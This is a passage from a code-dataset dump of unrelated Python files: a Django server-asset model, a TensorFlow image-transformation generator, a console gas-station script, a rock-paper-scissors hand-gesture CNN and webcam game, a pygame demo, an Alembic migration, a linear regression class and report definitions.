max_length=16, blank=True, null=True,\n default='Server', verbose_name=_('Asset type'),)\n env = models.CharField(choices=ENV_CHOICES, max_length=8, blank=True, null=True,\n default='Prod', verbose_name=_('Asset environment'),)\n status = models.CharField(choices=STATUS_CHOICES, max_length=12, null=True, blank=True,\n default='In 
use', verbose_name=_('Asset status'))\n\n # Some information\n public_ip = models.GenericIPAddressField(max_length=32, blank=True,\n null=True, verbose_name=_('Public IP'))\n remote_card_ip = models.CharField(max_length=16, null=True, blank=True,\n verbose_name=_('Remote control card IP'))\n cabinet_no = models.CharField(max_length=32, null=True, blank=True, verbose_name=_('Cabinet number'))\n cabinet_pos = models.IntegerField(null=True, blank=True, verbose_name=_('Cabinet position'))\n number = models.CharField(max_length=32, null=True, blank=True, verbose_name=_('Asset number'))\n\n # Collect\n vendor = models.CharField(max_length=64, null=True, blank=True, verbose_name=_('Vendor'))\n model = models.CharField(max_length=54, null=True, blank=True, verbose_name=_('Model'))\n sn = models.CharField(max_length=128, null=True, blank=True, verbose_name=_('Serial number'))\n\n cpu_model = models.CharField(max_length=64, null=True, blank=True, verbose_name=_('CPU model'))\n cpu_count = models.IntegerField(null=True, verbose_name=_('CPU count'))\n cpu_cores = models.IntegerField(null=True, verbose_name=_('CPU cores'))\n memory = models.CharField(max_length=64, null=True, blank=True, verbose_name=_('Memory'))\n disk_total = models.CharField(max_length=1024, null=True, blank=True, verbose_name=_('Disk total'))\n disk_info = models.CharField(max_length=1024, null=True, blank=True, verbose_name=_('Disk info'))\n\n platform = models.CharField(max_length=128, null=True, blank=True, verbose_name=_('Platform'))\n os = models.CharField(max_length=128, null=True, blank=True, verbose_name=_('OS'))\n os_version = models.CharField(max_length=16, null=True, blank=True, verbose_name=_('OS version'))\n os_arch = models.CharField(max_length=16, blank=True, null=True, verbose_name=_('OS arch'))\n hostname_raw = models.CharField(max_length=128, blank=True, null=True, verbose_name=_('Hostname raw'))\n\n created_by = models.CharField(max_length=32, null=True, blank=True, verbose_name=_('Created by'))\n date_created = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name=_('Date created'))\n comment = models.TextField(max_length=128, default='', blank=True, verbose_name=_('Comment'))\n\n def __unicode__(self):\n return '%s <%s: %s>' % (self.hostname, self.ip, self.port)\n __str__ = __unicode__\n\n @property\n def is_valid(self):\n warning = ''\n if not self.is_active:\n warning += ' inactive'\n else:\n return True, ''\n return False, warning\n\n def to_json(self):\n return {\n 'id': self.id,\n 'hostname': self.hostname,\n 'ip': self.ip,\n 'port': self.port,\n }\n\n def _to_secret_json(self):\n \"\"\"Ansible use it create inventory\"\"\"\n return {\n 'id': self.id,\n 'hostname': self.hostname,\n 'ip': self.ip,\n 'port': self.port,\n 'groups': [group.name for group in self.groups.all()],\n 'username': self.admin_user.username if self.admin_user else '',\n 'password': self.admin_user.password if self.admin_user else '',\n 'private_key': self.admin_user.private_key_file if self.admin_user else None,\n 'become': {\n 'method': self.admin_user.become_method,\n 'user': self.admin_user.become_user,\n 'pass': self.admin_user.become_pass,\n } if self.admin_user and self.admin_user.become else {},\n }\n\n class Meta:\n unique_together = ('ip', 'port')\n\n @classmethod\n def generate_fake(cls, count=100):\n from random import seed, choice\n import forgery_py\n from django.db import IntegrityError\n\n seed()\n for i in range(count):\n asset = cls(ip='%s.%s.%s.%s' % (i, i, i, i),\n 
hostname=forgery_py.internet.user_name(True),\n admin_user=choice(AdminUser.objects.all()),\n idc=choice(IDC.objects.all()),\n port=22,\n created_by='Fake')\n try:\n asset.save()\n asset.system_users = [choice(SystemUser.objects.all()) for i in range(3)]\n asset.groups = [choice(AssetGroup.objects.all()) for i in range(3)]\n logger.debug('Generate fake asset : %s' % asset.ip)\n except IntegrityError:\n print('Error continue')\n continue\n\n","sub_path":"jumpserver-dev/apps/assets/models/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"496719087","text":"import tensorflow as tf\nimport numpy as np\nimport tensorflow_addons as tfa\nimport layers\n\n\nclass ResidualBlock(tf.keras.layers.Layer):\n '''Defines a Block as used in the ResNet architecture\n 2 covolutional layers\n InstanceNormalization (instead of Batchnorm)\n Reflection Padding\n\n Keyword Arguments:\n nr_filters : amount of filters for the convolutional layers\n kernel_initializer: how to inititialize the weights'''\n def __init__(self, nr_filters, kernel_initializer, size):\n super(ResidualBlock,self).__init__()\n\n #use padding to keep the featuremap size constant even after applying convolutions\n #self.padd1 = layers.ReflectionPadding2D()\n\n #3x3 conv, normalization, relu, 3x3 conv, normalization, relu\n self.conv_1 = tf.keras.layers.Conv2D(filters = nr_filters, kernel_size = 3,\n kernel_initializer = kernel_initializer\n #kernel_regularizer = tf.keras.regularizers.l2(0.01),\n #padding = 'same'\n )\n\n #instance normalization\n self.norm_1 = tfa.layers.InstanceNormalization(\n gamma_initializer = tf.keras.initializers.RandomNormal(mean=0.0, stddev=0.02))\n\n self.relu_1 = tf.keras.layers.ReLU()\n\n #self.padd2 = layers.ReflectionPadding2D()\n self.conv_2 = tf.keras.layers.Conv2D(filters = nr_filters, kernel_size = 3,\n kernel_initializer = kernel_initializer\n # padding = 'same'\n )\n self.norm_2 = tfa.layers.InstanceNormalization(\n gamma_initializer = tf.keras.initializers.RandomNormal(mean=0.0, stddev=0.02))\n\n self.crop = tf.keras.layers.experimental.preprocessing.CenterCrop(height=size, width = size)\n\n\n self.relu_2 = tf.keras.layers.ReLU()\n\n def call(self, start_x):\n #x = self.padd1(start_x)\n x = self.conv_1(start_x)\n x = self.norm_1(x)\n\n x = self.relu_1(x)\n #x = self.padd2(x)\n x = self.conv_2(x)\n x = self.norm_2(x)\n # skip connections are used: add up the input of the block to its output\n # but first the input needs to be cropped as the output is smaller in max_size\n # (Johnson et al. 
do not use padding in residual blocks)\n start_x = self.crop(start_x)\n x = x + start_x\n x = self.relu_2(x)\n return x\n\n\n\nclass DownsampleBlock(tf.keras.layers.Layer):\n '''Block used for downsampling images/featuremaps with strided convolutions\n Convolutional layer, Instance Normalization, LeakyReLU activation\n\n Keyword Arguments:\n parameters needed to define convolutional layer'''\n def __init__(self, nr_filters, kernel_size, stride, padding, kernel_initializer):\n super(DownsampleBlock,self).__init__()\n\n self.conv = tf.keras.layers.Conv2D(nr_filters, kernel_size= kernel_size, strides = stride,\n padding=padding, kernel_initializer = kernel_initializer)\n self.norm_layer = tfa.layers.InstanceNormalization(\n gamma_initializer = tf.keras.initializers.RandomNormal(mean=0.0, stddev=0.02))\n\n self.activation = tf.keras.layers.LeakyReLU()\n\n def call(self, x):\n\n x = self.conv(x)\n x = self.norm_layer(x)\n\n x = self.activation(x)\n\n return x\n\n\n\nclass UpsampleBlock(tf.keras.layers.Layer):\n '''Block used for upsampling images with fractionally strided convolution,\n TransposedConvolutional layer, Instance Normalization, LeakyReLU activation\n\n Keyword Arguments:\n parameters needed to define convolutional layer'''\n def __init__(self, nr_filters, kernel_size, stride, kernel_initializer):\n super(UpsampleBlock,self).__init__()\n\n self.conv = tf.keras.layers.Conv2DTranspose(nr_filters, kernel_size= kernel_size, strides = stride,\n padding='same', kernel_initializer = kernel_initializer)\n self.norm_layer = tfa.layers.InstanceNormalization(\n gamma_initializer = tf.keras.initializers.RandomNormal(mean=0.0, stddev=0.02))\n\n self.activation = tf.keras.layers.LeakyReLU()\n\n def call(self, x):\n\n x = self.conv(x)\n x = self.norm_layer(x)\n\n x = self.activation(x)\n\n return x\n\n\n\n\nclass Generator(tf.keras.Model):\n '''Generator is built up from different Down-, upsampling and Residual blocks\n\n architecture based Image Transformation Network by Johnson'''\n def __init__(self):\n super(Generator, self).__init__()\n #structure as referenced by Zhu et al. 
is different from Johnson architecture:\n #Zhu: c7s1-64,d128,d256,R256,R256,R256, R256,R256,R256,u128,u64,c7s1-3\n\n #Weights are initialized from a Gaussian distribution N(0, 0.02).\n kernel_initializer = tf.random_normal_initializer(stddev=0.02)\n\n #padd before using a 7x7 kernel as done in the first layer (Defined in strided block)\n self.padd1 = layers.ReflectionPadding2D(padding=(40, 40))\n\n self.strided_block = [\n #Johnson: 32 x9 x9 conv, stride 1 -> 32× 208×208\n #but in the cycle gan paper use 7x7, 64\n DownsampleBlock(nr_filters =32, kernel_size = 9, stride = 1, padding = 'same', kernel_initializer = kernel_initializer),\n\n #Johnson: 64×3×3, conv, stride 2 -> 64×104× 104\n #Zhu: 128x3x3\n DownsampleBlock(nr_filters = 64,kernel_size = 3, stride = 2, padding = 'same',kernel_initializer = kernel_initializer),\n\n #Johnson: 128×3×3 conv, stride 2 -> 128×52x52\n #Zhu: 256\n DownsampleBlock(nr_filters =128, kernel_size = 3, stride = 2, padding = 'same', kernel_initializer = kernel_initializer)\n ]\n\n #Residual blocks -> 5 in Johnson architecture\n self.blocks = [\n # -> 128 x 48 x48\n ResidualBlock(128, kernel_initializer = kernel_initializer, size = 48),\n # 128 x 44 x44\n ResidualBlock(128, kernel_initializer = kernel_initializer, size = 44),\n # 128 x 40x40\n ResidualBlock(128, kernel_initializer = kernel_initializer, size = 40),\n # 128 x 36 x 36\n ResidualBlock(128, kernel_initializer = kernel_initializer, size = 36),\n # 128 x 32 x32\n ResidualBlock(128, kernel_initializer = kernel_initializer, size = 32),\n ]\n\n self.transposed_block = [\n #64×3×3 conv, stride 1/2 -> 64×64 x64\n UpsampleBlock(64,3,2, kernel_initializer),\n #32×3×3 conv, stride 1/2 -> 32×128×128\n UpsampleBlock(32,3,2, kernel_initializer),\n ]\n #padding:\n #self.padd2 = layers.ReflectionPadding2D(padding=(self.padds, self.padds))\n\n #3×9×9 conv, stride 1 3×128×128\n #Johnson et al. use tanh\n self.final_layer = tf.keras.layers.Conv2D(filters=3, kernel_size=9,\n strides =1, activation = tf.keras.activations.tanh,\n padding = 'same', kernel_initializer = kernel_initializer)\n\n\n def call(self, x):\n x = self.padd1(x)\n\n for layer in self.strided_block:\n x = layer(x)\n\n for block in self.blocks:\n x = block(x)\n\n for layer in self.transposed_block:\n x = layer(x)\n\n\n #x = self.padd2(x)\n\n x = self.final_layer(x)\n return x\n","sub_path":"models/generator_johns.py","file_name":"generator_johns.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214169448","text":"import sys\nimport time\nimport gas_core1\n\n\n\ntyping_speed = 12\ndef slow_type(t):\n for l in t:\n sys.stdout.write(l)\n sys.stdout.flush()\n time.sleep(typing_speed / 970.0)\n return input()\n\n\n \nslow_type('\\n⛽ WELCOME TO >>>VARGAS\\'S<<< GAS STATION! 
⛽\\n\\n PRESS \"ENTER\" 🔥🔥🔥!')\n\n\ndef print_menu():\n menu = {'regular': 1.89, 'midgrade': 1.99, 'premium': 2.09}\n print(menu)\n\ndef gallons(dollars, gas_type):\n if gas_type == 'regular':\n gallons = float(dollars) * 1.89\n return gallons\n elif gas_type == 'midgrade':\n gallons = float(dollars) * 1.99\n return gallons\n elif gas_type == 'premium':\n gallons = float(dollars) * 2.09\n return gallons\n else:\n print('\\n\\nInvalid Input...\\n\\n')\n time.sleep(.8)\n\ndef total(gallons, gas_type):\n if gas_type == 'regular':\n total = 1.89 * float(gallons)\n return total\n elif gas_type == 'midgrade':\n total = 1.99 * float(gallons)\n return total\n elif gas_type == 'premium':\n total = 2.09 * float(gallons)\n return total\n else:\n print('\\n\\nInvalid Input...\\n\\n')\n time.sleep(.8)\n\npay_option = slow_type('\\n\\n💲💲 Please Enter Payment Option From The Two We Provide.\\n\\n\"💲>>prepay<<💲\" Or \"💲>>pay after<<💲\": ')\nif pay_option == 'prepay':\n\n slow_type('\\n\\n➡ Please Take A Look At What We Have Here To Offer...\\n\\nPRESS \"ENTER\"...\\n\\n')\n \n\n print_menu()\n time.sleep(.4)\n \n gas_type = slow_type('\\n\\nPlease Enter Type Of Gas Desired: ')\n\n\n\n dollars = slow_type('\\n💲💲 Please Enter Cash Desired For Gas: $')\n\n \n\n print('\\n\\n\\n✔ Processing... ✔\\n\\n\\n')\n time.sleep(.4)\n\n print('You Have Chosen To Pump', gas_type, 'for ' + '$' + dollars, 'dollars.\\n\\n')\n time.sleep(2)\n print('\\n\\n\\nProcessing...😊')\n time.sleep(.9)\n slow_type('\\n\\n\\n\\n\\n\\nPRESS \"ENTER\" TO START!')\n print('\\n\\n\\n\\n⛽ Pumping... ⛽')\n time.sleep(3)\n print('\\nDONE!⛽')\n time.sleep(.5)\n slow_type('\\n\\nPRESS \"ENTER\" TO SEE RESULTS\\n\\n')\n \n print('\\n\\n\\n😊Thank You For Your Business..💲💲 \\n\\nYou Have Successfully Pumped:', gallons(dollars, gas_type), 'gallons!✔✔ \\n\\n')\n time.sleep(1.2)\n\nelif pay_option == 'pay after':\n slow_type('\\n\\nPlease Take A Look At What We Have Here To Offer. ↙\\n\\nPRESS \"ENTER\".\\n')\n\n print_menu()\n time.sleep(.5)\n\n gas_type = slow_type('\\n\\nPlease Enter Type Of Gas Desired: ')\n \n gallons = slow_type('\\n\\n♺Please Enter Gallons Desired To Pump ♺ : ')\n\n print('\\n\\nYou Have Chosen To Pump', gas_type, 'for', gallons, 'gallons.')\n time.sleep(2)\n\n input('\\n\\nPRESS \"ENTER\" TO START!')\n\n print('\\n\\n\\n✔ Pumping... ⛽\\n\\n\\n')\n time.sleep(2)\n print('\\n\\n✔✔✔DONE!✔✔✔\\n')\n time.sleep(.5)\n slow_type('\\n\\nPRESS \"ENTER\" TO SEE RESULTS\\n\\n')\n\n\n print('\\n\\n\\nThank Your Purchase! Your Total Is t: $', total(gallons, gas_type), 'dollars! 
\\n\\n')\n time.sleep(.2)\n\n\nslow_type('\\n\\n\\n\\n\\n\\n😊💲💲Please come again!!😊😊\\n\\nPRESS \"ENTER\" TO EXIT!')","sub_path":"gas_station.py","file_name":"gas_station.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"423199569","text":"import colorlover as cl\r\nfrom numpy import array\r\n\r\ndef palette_de_couleurs(nb_of_colors):\r\n \"\"\" Input: the length of the list with different colors\r\n Output: a list with rgb colors in an ascending order\r\n \"\"\"\r\n \r\n bupu = cl.scales['9']['seq']['Reds']\r\n bupu500 = cl.interp( bupu, nb_of_colors ) # Map color scale to 500 bins\r\n colors=cl.to_rgb(bupu500)\r\n for i in range(nb_of_colors):\r\n color= colors[i][3:]\r\n c=array((0,0,0))\r\n for j in range(3):\r\n c[j]=color.strip(\"()\").split(\",\")[j]\r\n colors[i]=c\r\n return colors\r\n\r\n\r\n\"\"\"\r\nprint(cl.scales)\r\nprint(\"\\n\")\r\nprint(palette_de_couleurs(9))\r\n\"\"\"","sub_path":"INFOQ2/Projet Q2/color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"277364384","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 14 15:35:35 2018\n\n@author: srinivas\n\"\"\"\n\nfrom imageio import imread\nimport numpy as np\nimport pandas as pd\nimport os\nroot = './RPS_data' # or ‘./test’ depending on for which the CSV is being created\n\n# go through each directory in the root folder given above\nfor directory, subdirectories, files in os.walk(root):\n# go through each file in that directory\n for file in files:\n # read the image file and extract its pixels\n print(file)\n im = imread(os.path.join(directory,file))\n value = im.flatten()\n# I renamed the folders containing digits to the contained digit itself. For example, digit_0 folder was renamed to 0.\n# so taking the 9th value of the folder gave the digit (i.e. 
\"./train/8\" ==> 9th value is 8), which was inserted into the first column of the dataset.\n value = np.hstack((directory[11:],value))\n df = pd.DataFrame(value).T\n df = df.sample(frac=1) # shuffle the dataset\n with open('train_foo.csv', 'a') as dataset:\n df.to_csv(dataset, header=False, index=False)\n \n#building the model \nimport numpy as np\nfrom keras.layers import Dense, Flatten, Conv2D\nfrom keras.layers import MaxPooling2D, Dropout\nfrom keras.utils import np_utils, print_summary\nfrom keras.models import Sequential\nfrom keras.callbacks import ModelCheckpoint\nfrom sklearn.model_selection import train_test_split\nfrom keras.callbacks import TensorBoard\nimport pandas as pd\n\ndef keras_model(image_x, image_y):\n num_of_classes = 4\n model = Sequential()\n model.add(Conv2D(32, (5, 5), input_shape=(image_x, image_y, 1), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'))\n model.add(Conv2D(64, (5, 5), activation='relu'))\n model.add(MaxPooling2D(pool_size=(5, 5), strides=(5, 5), padding='same'))\n model.add(Flatten())\n model.add(Dense(1024, activation='relu'))\n model.add(Dropout(0.6))\n model.add(Dense(num_of_classes, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n filepath = \"train_RPS.h5\"\n checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\n callbacks_list = [checkpoint]\n callbacks_list.append(TensorBoard(log_dir='RPS_logs'))\n\n return model, callbacks_list\n\n\ndef loadData():\n data = pd.read_csv(\"train_foo_RPS.csv\")\n dataset = np.array(data)\n np.random.shuffle(dataset)\n features = dataset[:, 1:2501]\n features = features / 255.\n labels = dataset[:, 0]\n labels = labels.reshape(labels.shape[0], 1)\n train_x, test_x, train_y, test_y = train_test_split(features, labels, random_state=0,\n test_size=0.2)\n return train_x, test_x, train_y, test_y\n\n\ndef reshapeData(train_x, test_x, train_y, test_y):\n train_y = np_utils.to_categorical(train_y)\n test_y = np_utils.to_categorical(test_y)\n train_x = train_x.reshape(train_x.shape[0], 50, 50, 1)\n test_x = test_x.reshape(test_x.shape[0], 50, 50, 1)\n return train_x, test_x, train_y, test_y\n\n\ndef printInfo(train_x, test_x, train_y, test_y):\n print(\"number of training examples = \" + str(train_x.shape[0]))\n print(\"number of test examples = \" + str(test_x.shape[0]))\n print(\"X_train shape: \" + str(train_x.shape))\n print(\"Y_train shape: \" + str(train_y.shape))\n print(\"X_test shape: \" + str(test_x.shape))\n print(\"Y_test shape: \" + str(test_y.shape))\n\n\ndef main():\n train_x, test_x, train_y, test_y = loadData()\n printInfo(train_x, test_x, train_y, test_y)\n print(len(train_x[0]))\n train_x, test_x, train_y, test_y = reshapeData(train_x, test_x, train_y, test_y)\n printInfo(train_x, test_x, train_y, test_y)\n model, callbacks_list = keras_model(train_x.shape[1], train_x.shape[2])\n model.fit(train_x, train_y, validation_data=(test_x, test_y), epochs=2, batch_size=64,\n callbacks=callbacks_list)\n scores = model.evaluate(test_x, test_y, verbose=1)\n print(\"CNN Error: %.2f%%\" % (100 - scores[1] * 100))\n print_summary(model)\n\n model.save('RPS.h5')\n\n\nif __name__ == '__main__':\n main()\n\n\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nimport os\nfrom random import randint\n\nmodel = load_model('RPS.h5')\n\n\ndef calcResult(pred_class, cpu):\n if pred_class == cpu:\n return 'draw'\n if pred_class == 1 and (cpu == 
3):\n return 'user'\n if pred_class == 2 and (cpu == 1 ):\n return 'user'\n if pred_class == 3 and (cpu == 2):\n return 'user'\n return 'cpu'\n\n\ndef main():\n flag = 0\n result = ''\n emojis = get_emojis()\n cap = cv2.VideoCapture(0)\n x, y, w, h = 300, 50, 350, 350\n\n while (cap.isOpened()):\n ret, img = cap.read()\n img = cv2.flip(img, 1)\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n mask2 = cv2.inRange(hsv, np.array([2, 50, 60]), np.array([25, 150, 255]))\n res = cv2.bitwise_and(img, img, mask=mask2)\n gray = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)\n median = cv2.GaussianBlur(gray, (5, 5), 0)\n\n kernel_square = np.ones((5, 5), np.uint8)\n dilation = cv2.dilate(median, kernel_square, iterations=2)\n opening = cv2.morphologyEx(dilation, cv2.MORPH_CLOSE, kernel_square)\n ret, thresh = cv2.threshold(opening, 30, 255, cv2.THRESH_BINARY)\n\n thresh = thresh[y:y + h, x:x + w]\n contours = cv2.findContours(thresh.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)[1]\n if len(contours) > 0:\n contour = max(contours, key=cv2.contourArea)\n if cv2.contourArea(contour) > 2500:\n if flag == 0:\n cpu = (randint(1,3))\n flag = 1\n x, y, w1, h1 = cv2.boundingRect(contour)\n newImage = thresh[y:y + h1, x:x + w1]\n newImage = cv2.resize(newImage, (50, 50))\n pred_probab, pred_class = keras_predict(model, newImage)\n print(pred_class, pred_probab)\n img = overlay(img, emojis[pred_class], 370, 50, 90, 90)\n img = overlay(img, emojis[cpu], 530, 50, 90, 90)\n result = calcResult(pred_class, cpu)\n\n elif len(contours) == 0:\n flag = 0\n x, y, w, h = 300, 50, 350, 350\n cv2.putText(img, 'USER', (380, 40),\n cv2.FONT_HERSHEY_COMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(img, 'CPU', (550, 40),\n cv2.FONT_HERSHEY_COMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(img, 'Result : ', (420, 170),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n if result == 'user':\n cv2.putText(img, 'USER', (530, 170),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)\n elif result=='cpu':\n cv2.putText(img, 'CPU', (530, 170),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n elif result=='draw':\n cv2.putText(img, 'DRAW', (530, 170),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 2)\n else:\n pass\n cv2.imshow(\"Frame\", img)\n cv2.imshow(\"Contours\", thresh)\n k = cv2.waitKey(10)\n if k == 27:\n break\n\n\ndef keras_predict(model, image):\n processed = keras_process_image(image)\n pred_probab = model.predict(processed)[0]\n pred_class = list(pred_probab).index(max(pred_probab))\n return max(pred_probab), pred_class\n\n\ndef keras_process_image(img):\n image_x = 50\n image_y = 50\n img = cv2.resize(img, (image_x, image_y))\n img = np.array(img, dtype=np.float32)\n img = np.reshape(img, (-1, image_x, image_y, 1))\n return img\n\n\ndef get_emojis():\n emojis_folder = 'RPS_emo/'\n emojis = []\n for emoji in range(len(os.listdir(emojis_folder))):\n print(emoji)\n emojis.append(cv2.imread(emojis_folder + str(emoji) + '.png', -1))\n return emojis\n\n\ndef overlay(image, emoji, x, y, w, h):\n emoji = cv2.resize(emoji, (w, h))\n try:\n image[y:y + h, x:x + w] = blend_transparent(image[y:y + h, x:x + w], emoji)\n except:\n pass\n return image\n\n\ndef blend_transparent(face_img, overlay_t_img):\n # Split out the transparency mask from the colour info\n overlay_img = overlay_t_img[:, :, :3] # Grab the BRG planes\n overlay_mask = overlay_t_img[:, :, 3:] # And the alpha plane\n\n # Again calculate the inverse mask\n background_mask = 255 - overlay_mask\n\n # Turn the masks into three channel, so we can use them as weights\n overlay_mask = 
cv2.cvtColor(overlay_mask, cv2.COLOR_GRAY2BGR)\n background_mask = cv2.cvtColor(background_mask, cv2.COLOR_GRAY2BGR)\n\n # Create a masked out face image, and masked out overlay\n # We convert the images to floating point in range 0.0 - 1.0\n face_part = (face_img * (1 / 255.0)) * (background_mask * (1 / 255.0))\n overlay_part = (overlay_img * (1 / 255.0)) * (overlay_mask * (1 / 255.0))\n\n # And finally just add them together, and rescale it back to an 8bit integer image\n return np.uint8(cv2.addWeighted(face_part, 255.0, overlay_part, 255.0, 0.0))\n\n\nkeras_predict(model, np.zeros((50, 50, 1), dtype=np.uint8))\nmain()\n\n\n \n","sub_path":"Rock Paper Scissor game.py","file_name":"Rock Paper Scissor game.py","file_ext":"py","file_size_in_byte":9287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"438660778","text":"#this script has the dimension objects\n\nimport pygame, os, sys\nfrom pygame.locals import *\nimport File\n\nimage_path = File.getImagePath()\n\n#set dimensions\nwidth, height = 1080, 640\ndim = (width, height)\nplayerSize = (320, 200)\nmidWidth = (width - playerSize[0]) / 2\nmidHeight = (height - playerSize[1]) / 2\nmidPos = (midWidth, midHeight)\n","sub_path":"Dimension.py","file_name":"Dimension.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"533175789","text":"\"\"\"Add templates\n\nRevision ID: 2b0edcfa57b4\nRevises: 24be36b8c67\nCreate Date: 2015-11-24 17:50:13.280722\n\n\"\"\"\n\nfrom alembic import op\nimport elixir\nimport sqlalchemy as sa\n\nfrom kansha.board.models import create_template_empty, create_template_todo\n\n# revision identifiers, used by Alembic.\nrevision = '2b0edcfa57b4'\ndown_revision = '24be36b8c67'\n\ndef upgrade():\n # Add column\n op.add_column('board', sa.Column('is_template', sa.Boolean, default=False))\n\n # Setup models\n elixir.metadata.bind = op.get_bind()\n elixir.setup_all()\n\n # Create default template\n create_template_empty()\n create_template_todo()\n\n\ndef downgrade():\n op.drop_column('board', 'is_template')\n","sub_path":"kansha/alembic/versions/2b0edcfa57b4_add_templates.py","file_name":"2b0edcfa57b4_add_templates.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"606622090","text":"\"\"\"Numpy based linear regression.\"\"\"\nfrom typing import List\nimport numpy as np\n\nfrom lr import base\n\n\nclass LinearRegressionNumpy(base.LinearRegression):\n \"\"\"Class.\"\"\"\n\n def fit(self, x: List[float], y: List[float]) -> base.LinearRegression:\n \"\"\"Fitting method.\"\"\"\n n = np.size(x)\n mean_x, mean_y = np.mean(x), np.mean(y)\n\n ss_xy = np.sum([y[i] * x[i] for i in range(n)]) - n * mean_y * mean_x\n ss_xx = np.sum([x[i] * x[i] for i in range(n)]) - n * mean_x * mean_x\n\n w = ss_xy / ss_xx\n b = mean_y - w * mean_x\n self._coef = (b, w)\n\n return self\n","sub_path":"l1-tn-kaluzny1995-master/task_5/lr/lr_np.py","file_name":"lr_np.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"571195694","text":"from custom.world_vision.reports import AccordionTTCReport\nfrom custom.world_vision.filters import LocationFilter, WVDatespanFilter\nfrom custom.world_vision.sqldata.child_sqldata import ImmunizationDetailsFirstYear, \\\n ImmunizationDetailsSecondYear, ChildDeworming, 
ChildRegistrationDetails, ClosedChildCasesBreakdown, \\\n ChildrenDeaths, ChildrenDeathDetails, NutritionMeanMedianBirthWeightDetails, NutritionBirthWeightDetails,\\\n NutritionFeedingDetails, EBFStoppingDetails, ChildHealthIndicators, ChildrenDeathsByMonth\nfrom dimagi.utils.decorators.memoized import memoized\n\n\nclass ChildTTCReport(AccordionTTCReport):\n report_template_path = 'world_vision/accordion_report.html'\n report_title = 'Child Report'\n name = 'Child Report'\n title = 'Child Report'\n slug = 'child_report'\n fields = [WVDatespanFilter, LocationFilter]\n default_rows = 25\n exportable = True\n\n @property\n @memoized\n def data_providers(self):\n config = self.report_config\n return [\n [ChildRegistrationDetails(config=config)],\n [ClosedChildCasesBreakdown(config=config)],\n [ImmunizationDetailsFirstYear(config=config)],\n [ImmunizationDetailsSecondYear(config=config)],\n [\n ChildrenDeaths(config=config),\n ChildrenDeathDetails(config=config),\n ChildrenDeathsByMonth(config=config)\n ],\n [\n NutritionMeanMedianBirthWeightDetails(config=config),\n NutritionBirthWeightDetails(config=config),\n NutritionFeedingDetails(config=config)\n ],\n [EBFStoppingDetails(config=config)],\n [ChildHealthIndicators(config=config)],\n [ChildDeworming(config=config)]\n ]\n","sub_path":"custom/world_vision/reports/child_report.py","file_name":"child_report.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"178455495","text":"# Import pygame module\nimport pygame\n# Initialize pygame\npygame.init()\n# Set initial window size\nwin = pygame.display.set_mode((500, 500))\n# Set caption on display window\npygame.display.set_caption(\"Epic Game\")\n# Initialize character position, width, and height, vel\nx = 50\ny = 50\nwidth = 40\nheight = 60\nvel = 20\n# Main loop that runs while game is running\nrun = True\nwhile run:\n # .1 second timer delay\n pygame.time.delay(100)\n # Loop through every event and check if they have happened\n for event in pygame.event.get():\n # If quit button in top right corner is pressed\n if event.type == pygame.QUIT:\n run = False\n # Checks for key presses\n keys = pygame.key.get_pressed()\n # Checks for left key press\n if keys[pygame.K_LEFT]:\n x -= vel\n # Checks for right key press\n if keys[pygame.K_RIGHT]:\n x += vel\n # Checks for up key press\n if keys[pygame.K_UP]:\n y -= vel\n # Checks for down key press\n if keys[pygame.K_DOWN]:\n y += vel\n #Fill screen with black so your rectangle does not keep drawing\n win.fill((0,0,0))\n # Now draw our pygame rectangle character\n pygame.draw.rect(win, (255, 0, 0), (x,y,width,height))\n # Now we need to update our display\n pygame.display.update() \n\npygame.quit()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"611072360","text":"import datetime\nimport os\n\nfrom charmhelpers.core import hookenv\n\nfrom charms.reactive import hook\nfrom charms.reactive import RelationBase\nfrom charms.reactive import scopes\n\n\nclass LocalMonitorsProvides(RelationBase):\n scope = scopes.GLOBAL\n\n @hook('{provides:local-monitors}-relation-{joined,changed}')\n def changed_local(self):\n self.set_state('{relation_name}.available')\n\n @hook('{provides:local-monitors}-relation-{broken,departed}')\n def broken_local(self):\n self.remove_state('{relation_name}.available')\n\n def add_check(self, args, 
